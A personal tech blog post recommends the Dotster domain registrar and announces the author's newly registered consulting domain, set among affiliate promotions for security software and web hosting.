Dotster is my registrar for all of my Domains, and most of my Webmaster Services customers use them as well. Dotster is an ICAAN Accredited Registrar and has been around for quite a while now. I first learned about them from Leo LaPorte, on Tech TV. I have more details about their services on my Dotster web page, and on my web hosting page. Dotster accepts Domain registrations from people around the World.

I was there on the 26th and bought a new Domain name, www.computer-consulting-services.com and got a free .info with the same prefix. I'll be putting content on it over the next few weeks, but right now it is parked, waiting for my brain cells to wake up again. Watch my blog for details about this new Domain.

Get Norton 360 Version 4.0 - All-In-One Security. If you have a non-current version of a Symantec security program and wish to renew your definition updates subscription, or upgrade to a new version at a discount, go to the Norton Product Upgrades & Renewals page.

About the author
Wiz FeinbergWiz's Blog is written by Bob "Wiz" Feinberg, an experienced freelance computer consultant, troubleshooter and webmaster. Wiz's specialty is in computer and website security. Wizcrafts Computer Services was established in 1996.

I produce this blog and website at my own expense. If you find this information valuable please consider making a donation via PayPal.


Get Reliable Web Hosting

BlueHost Web Hosting $6.95

Do you want reliable, yet affordable shared website hosting, with US based phone, email and live chat tech support? If so, you should consider signing up with BlueHost. You can host Unlimited Domains and sub-domains on one account, each complete with their own FTP and Email Accounts. You get unlimited disk space, data transfer & databases, plus dozens of free secured scripts that are easy to install with a few clicks. cPanel Pro control panels support all current web technologies, logs and scripts. All new and transfer accounts are entitled to 1 free domain name and a $50 Google AdWords credit. Pay just $6.95/month, for 2 or 3 years, prepaid. No setup fee and a 30-day money back guarantee. Sign-up with BlueHost Here

Use OpenDNS

MailWasher Pro is an effective spam and web threat filter for your desktop email client.
MailWasher Pro is a POP3 email client spam filter
Download MailWasher Pro Here

Creative Commons License This weblog is licensed under a Creative Commons License.
The content on this blog may be reprinted provided you do not modify the content and that you give credit to Wizcrafts and provide a link back to the blog home page, or individual blog articles you wish to reprint. Commercial use, or derivative work requires written permission from the author.

Start your own blog today